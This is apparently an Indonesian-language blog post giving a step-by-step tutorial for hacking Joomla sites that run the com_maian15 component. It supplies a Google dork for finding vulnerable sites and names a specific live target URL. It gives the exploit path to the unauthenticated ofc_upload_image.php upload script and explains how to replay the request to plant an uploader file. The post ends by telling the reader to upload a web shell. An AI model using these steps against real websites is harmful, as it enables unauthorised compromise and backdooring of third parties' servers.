okedeh cekidot:
cari target dlu..
Dork: inurl:"option=com_maian15"
silahkan dikembangkan
disini ane kasih 1 live target..
http://www.akindeledecker.com/C2-LyricalOverflow/
exploit:
administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php
langsung inject om,..
http://www.akindeledecker.com/C2-Lyrical...cekson.php
NB: sebenarnya ntuh file udah terupload.. dgn nama file cekson.php tapi isi filenya gak ada
lanjut,. kita gunakan live http header (add on moksilla )
klik replay..
langsung parkir backdoor tapi disini ane gak langsung parkir backdoor , ane cuma parkir uploader
uploader dari om unyil
klik replay
dan walaaaa...
uploader ane sdh tertanam
direktori file:
administrator/components/com_maian15/charts/tmp-upload-images/cekson.php
Sekarang tinggal upload "the real shell"
sekian tutor cupu dari ane
Maaf trit nnya berantakan :ngakak malas edit T.T
Post a Comment